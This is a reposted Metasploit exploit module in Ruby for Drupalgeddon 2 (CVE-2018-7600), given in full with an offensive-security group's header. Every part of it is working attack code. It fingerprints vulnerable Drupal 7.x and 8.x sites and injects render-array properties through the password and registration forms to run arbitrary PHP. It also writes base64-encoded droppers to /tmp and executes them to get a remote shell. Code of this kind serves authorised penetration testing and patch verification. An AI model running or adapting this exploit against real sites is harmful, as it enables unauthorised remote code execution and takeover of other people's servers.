Drupal Exploit - Drupalgeddon_2

1. ##
2. # Este Modulo requiere Metasploit: https://metasploit.com/download
3. # Current source: https://github.com/rapid7/metasploit-framework
4. # RedBird Seguridad Ofensiva
5. # PackStorm
6. ##
7.  
8. class MetasploitModule < Msf::Exploit::Remote
9.  
10. Rank = ExcellentRanking
11.  
12. include Msf::Exploit::Remote::HttpClient
13. # XXX: CmdStager can't handle badchars
14. include Msf::Exploit::PhpEXE
15. include Msf::Exploit::FileDropper
16.  
17. def initialize(info = {})
18. super(update_info(info,
19. 'Name' => 'Drupal Drupalgeddon 2 Forms API Property Injection',
20. 'Description' => %q{
21. This module exploits a Drupal property injection in the Forms API.
22.  
23. Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.
24. },
25. 'Author' => [
26. 'Jasper Mattsson', # Vulnerability discovery
27. 'a2u', # Proof of concept (Drupal 8.x)
28. 'Nixawk', # Proof of concept (Drupal 8.x)
29. 'FireFart', # Proof of concept (Drupal 7.x)
30. 'wvu' # Metasploit module
31. ],
32. 'References' => [
33. ['CVE', '2018-7600'],
34. ['URL', 'https://www.drupal.org/sa-core-2018-002'],
35. ['URL', 'https://greysec.net/showthread.php?tid=2912'],
36. ['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'],
37. ['URL', 'https://github.com/a2u/CVE-2018-7600'],
38. ['URL', 'https://github.com/nixawk/labs/issues/19'],
39. ['URL', 'https://github.com/FireFart/CVE-2018-7600'],
40. ['AKA', 'SA-CORE-2018-002'],
41. ['AKA', 'Drupalgeddon 2']
42. ],
43. 'DisclosureDate' => 'Mar 28 2018',
44. 'License' => MSF_LICENSE,
45. 'Platform' => ['php', 'unix', 'linux'],
46. 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],
47. 'Privileged' => false,
48. 'Payload' => {'BadChars' => '&>\''},
49. # XXX: Using "x" in Gem::Version::new isn't technically appropriate
50. 'Targets' => [
51. #
52. # Automatic targets (PHP, cmd/unix, native)
53. #
54. ['Automatic (PHP In-Memory)',
55. 'Platform' => 'php',
56. 'Arch' => ARCH_PHP,
57. 'Type' => :php_memory
58. ],
59. ['Automatic (PHP Dropper)',
60. 'Platform' => 'php',
61. 'Arch' => ARCH_PHP,
62. 'Type' => :php_dropper
63. ],
64. ['Automatic (Unix In-Memory)',
65. 'Platform' => 'unix',
66. 'Arch' => ARCH_CMD,
67. 'Type' => :unix_memory
68. ],
69. ['Automatic (Linux Dropper)',
70. 'Platform' => 'linux',
71. 'Arch' => [ARCH_X86, ARCH_X64],
72. 'Type' => :linux_dropper
73. ],
74. #
75. # Drupal 7.x targets (PHP, cmd/unix, native)
76. #
77. ['Drupal 7.x (PHP In-Memory)',
78. 'Platform' => 'php',
79. 'Arch' => ARCH_PHP,
80. 'Version' => Gem::Version.new('7.x'),
81. 'Type' => :php_memory
82. ],
83. ['Drupal 7.x (PHP Dropper)',
84. 'Platform' => 'php',
85. 'Arch' => ARCH_PHP,
86. 'Version' => Gem::Version.new('7.x'),
87. 'Type' => :php_dropper
88. ],
89. ['Drupal 7.x (Unix In-Memory)',
90. 'Platform' => 'unix',
91. 'Arch' => ARCH_CMD,
92. 'Version' => Gem::Version.new('7.x'),
93. 'Type' => :unix_memory
94. ],
95. ['Drupal 7.x (Linux Dropper)',
96. 'Platform' => 'linux',
97. 'Arch' => [ARCH_X86, ARCH_X64],
98. 'Version' => Gem::Version.new('7.x'),
99. 'Type' => :linux_dropper
100. ],
101. #
102. # Drupal 8.x targets (PHP, cmd/unix, native)
103. #
104. ['Drupal 8.x (PHP In-Memory)',
105. 'Platform' => 'php',
106. 'Arch' => ARCH_PHP,
107. 'Version' => Gem::Version.new('8.x'),
108. 'Type' => :php_memory
109. ],
110. ['Drupal 8.x (PHP Dropper)',
111. 'Platform' => 'php',
112. 'Arch' => ARCH_PHP,
113. 'Version' => Gem::Version.new('8.x'),
114. 'Type' => :php_dropper
115. ],
116. ['Drupal 8.x (Unix In-Memory)',
117. 'Platform' => 'unix',
118. 'Arch' => ARCH_CMD,
119. 'Version' => Gem::Version.new('8.x'),
120. 'Type' => :unix_memory
121. ],
122. ['Drupal 8.x (Linux Dropper)',
123. 'Platform' => 'linux',
124. 'Arch' => [ARCH_X86, ARCH_X64],
125. 'Version' => Gem::Version.new('8.x'),
126. 'Type' => :linux_dropper
127. ]
128. ],
129. 'DefaultTarget' => 0, # Automatic (PHP In-Memory)
130. 'DefaultOptions' => {'WfsDelay' => 2}
131. ))
132.  
133. register_options([
134. OptString.new('TARGETURI', [true, 'Path to Drupal install', '/']),
135. OptString.new('PHP_FUNC', [true, 'PHP function to execute', 'passthru']),
136. OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', false])
137. ])
138.  
139. register_advanced_options([
140. OptBool.new('ForceExploit', [false, 'Override check result', false]),
141. OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])
142. ])
143. end
144.  
145. def check
146. checkcode = CheckCode::Safe
147.  
148. if drupal_version
149. print_status("Drupal #{@version} targeted at #{full_uri}")
150. checkcode = CheckCode::Detected
151. else
152. print_error('Could not determine Drupal version to target')
153. return CheckCode::Unknown
154. end
155.  
156. if drupal_unpatched?
157. print_good('Drupal appears unpatched in CHANGELOG.txt')
158. checkcode = CheckCode::Appears
159. end
160.  
161. token = random_crap
162. res = execute_command(token, func: 'printf')
163.  
164. if res && res.body.start_with?(token)
165. checkcode = CheckCode::Vulnerable
166. end
167.  
168. checkcode
169. end
170.  
171. def exploit
172. unless check == CheckCode::Vulnerable || datastore['ForceExploit']
173. fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
174. end
175.  
176. if datastore['PAYLOAD'] == 'cmd/unix/generic'
177. print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')
178. # XXX: Naughty datastore modification
179. datastore['DUMP_OUTPUT'] = true
180. end
181.  
182. # NOTE: assert() is attempted first, then PHP_FUNC if that fails
183. case target['Type']
184. when :php_memory
185. execute_command(payload.encoded, func: 'assert')
186.  
187. sleep(wfs_delay)
188. return if session_created?
189.  
190. # XXX: This will spawn a *very* obvious process
191. execute_command("php -r '#{payload.encoded}'")
192. when :unix_memory
193. execute_command(payload.encoded)
194. when :php_dropper, :linux_dropper
195. dropper_assert
196.  
197. sleep(wfs_delay)
198. return if session_created?
199.  
200. dropper_exec
201. end
202. end
203.  
204. def dropper_assert
205. php_file = Pathname.new(
206. "#{datastore['WritableDir']}/#{random_crap}.php"
207. ).cleanpath
208.  
209. # Return the PHP payload or a PHP binary dropper
210. dropper = get_write_exec_payload(
211. writable_path: datastore['WritableDir'],
212. unlink_self: true # Worth a shot
213. )
214.  
215. # Encode away potential badchars with Base64
216. dropper = Rex::Text.encode_base64(dropper)
217.  
218. # Stage 1 decodes the PHP and writes it to disk
219. stage1 = %Q{
220. file_put_contents("#{php_file}", base64_decode("#{dropper}"));
221. }
222.  
223. # Stage 2 executes said PHP in-process
224. stage2 = %Q{
225. include_once("#{php_file}");
226. }
227.  
228. # :unlink_self may not work, so let's make sure
229. register_file_for_cleanup(php_file)
230.  
231. # Hopefully pop our shell with assert()
232. execute_command(stage1.strip, func: 'assert')
233. execute_command(stage2.strip, func: 'assert')
234. end
235.  
236. def dropper_exec
237. php_file = "#{random_crap}.php"
238. tmp_file = Pathname.new(
239. "#{datastore['WritableDir']}/#{php_file}"
240. ).cleanpath
241.  
242. # Return the PHP payload or a PHP binary dropper
243. dropper = get_write_exec_payload(
244. writable_path: datastore['WritableDir'],
245. unlink_self: true # Worth a shot
246. )
247.  
248. # Encode away potential badchars with Base64
249. dropper = Rex::Text.encode_base64(dropper)
250.  
251. # :unlink_self may not work, so let's make sure
252. register_file_for_cleanup(php_file)
253.  
254. # Write the payload or dropper to disk (!)
255. # NOTE: Analysis indicates > is a badchar for 8.x
256. execute_command("echo #{dropper} | base64 -d | tee #{php_file}")
257.  
258. # Attempt in-process execution of our PHP script
259. send_request_cgi(
260. 'method' => 'GET',
261. 'uri' => normalize_uri(target_uri.path, php_file)
262. )
263.  
264. sleep(wfs_delay)
265. return if session_created?
266.  
267. # Try to get a shell with PHP CLI
268. execute_command("php #{php_file}")
269.  
270. sleep(wfs_delay)
271. return if session_created?
272.  
273. register_file_for_cleanup(tmp_file)
274.  
275. # Fall back on our temp file
276. execute_command("echo #{dropper} | base64 -d | tee #{tmp_file}")
277. execute_command("php #{tmp_file}")
278. end
279.  
280. def execute_command(cmd, opts = {})
281. func = opts[:func] || datastore['PHP_FUNC'] || 'passthru'
282.  
283. vprint_status("Executing with #{func}(): #{cmd}")
284.  
285. res =
286. case @version.to_s
287. when '7.x'
288. exploit_drupal7(func, cmd)
289. when '8.x'
290. exploit_drupal8(func, cmd)
291. end
292.  
293. if res && res.code != 200
294. print_error("Unexpected reply: #{res.inspect}")
295. return
296. end
297.  
298. if res && datastore['DUMP_OUTPUT']
299. print_line(res.body)
300. end
301.  
302. res
303. end
304.  
305. def drupal_version
306. if target['Version']
307. @version = target['Version']
308. return @version
309. end
310.  
311. res = send_request_cgi(
312. 'method' => 'GET',
313. 'uri' => target_uri.path
314. )
315.  
316. return unless res && res.code == 200
317.  
318. # Check for an X-Generator header
319. @version =
320. case res.headers['X-Generator']
321. when /Drupal 7/
322. Gem::Version.new('7.x')
323. when /Drupal 8/
324. Gem::Version.new('8.x')
325. end
326.  
327. return @version if @version
328.  
329. # Check for a <meta> tag
330. generator = res.get_html_document.at(
331. '//meta[@name = "Generator"]/@content'
332. )
333.  
334. return unless generator
335.  
336. @version =
337. case generator.value
338. when /Drupal 7/
339. Gem::Version.new('7.x')
340. when /Drupal 8/
341. Gem::Version.new('8.x')
342. end
343. end
344.  
345. def drupal_unpatched?
346. unpatched = true
347.  
348. # Check for patch level in CHANGELOG.txt
349. uri =
350. case @version.to_s
351. when '7.x'
352. normalize_uri(target_uri.path, 'CHANGELOG.txt')
353. when '8.x'
354. normalize_uri(target_uri.path, 'core/CHANGELOG.txt')
355. end
356.  
357. res = send_request_cgi(
358. 'method' => 'GET',
359. 'uri' => uri
360. )
361.  
362. return unless res && res.code == 200
363.  
364. if res.body.include?('SA-CORE-2018-002')
365. unpatched = false
366. end
367.  
368. unpatched
369. end
370.  
371. def exploit_drupal7(func, code)
372. vars_get = {
373. 'q' => 'user/password',
374. 'name[#post_render][]' => func,
375. 'name[#markup]' => code,
376. 'name[#type]' => 'markup'
377. }
378.  
379. vars_post = {
380. 'form_id' => 'user_pass',
381. '_triggering_element_name' => 'name'
382. }
383.  
384. res = send_request_cgi(
385. 'method' => 'POST',
386. 'uri' => target_uri.path,
387. 'vars_get' => vars_get,
388. 'vars_post' => vars_post
389. )
390.  
391. return res unless res && res.code == 200
392.  
393. form_build_id = res.get_html_document.at(
394. '//input[@name = "form_build_id"]/@value'
395. )
396.  
397. return res unless form_build_id
398.  
399. vars_get = {
400. 'q' => "file/ajax/name/#value/#{form_build_id.value}"
401. }
402.  
403. vars_post = {
404. 'form_build_id' => form_build_id.value
405. }
406.  
407. send_request_cgi(
408. 'method' => 'POST',
409. 'uri' => target_uri.path,
410. 'vars_get' => vars_get,
411. 'vars_post' => vars_post
412. )
413. end
414.  
415. def exploit_drupal8(func, code)
416. # Clean URLs are enabled by default and "can't" be disabled
417. uri = normalize_uri(target_uri.path, 'user/register')
418.  
419. vars_get = {
420. 'element_parents' => 'account/mail/#value',
421. 'ajax_form' => 1,
422. '_wrapper_format' => 'drupal_ajax'
423. }
424.  
425. vars_post = {
426. 'form_id' => 'user_register_form',
427. '_drupal_ajax' => 1,
428. 'mail[#type]' => 'markup',
429. 'mail[#post_render][]' => func,
430. 'mail[#markup]' => code
431. }
432.  
433. send_request_cgi(
434. 'method' => 'POST',
435. 'uri' => uri,
436. 'vars_get' => vars_get,
437. 'vars_post' => vars_post
438. )
439. end
440.  
441. def random_crap
442. Rex::Text.rand_text_alphanumeric(8..42)
443. end
444.  
445. end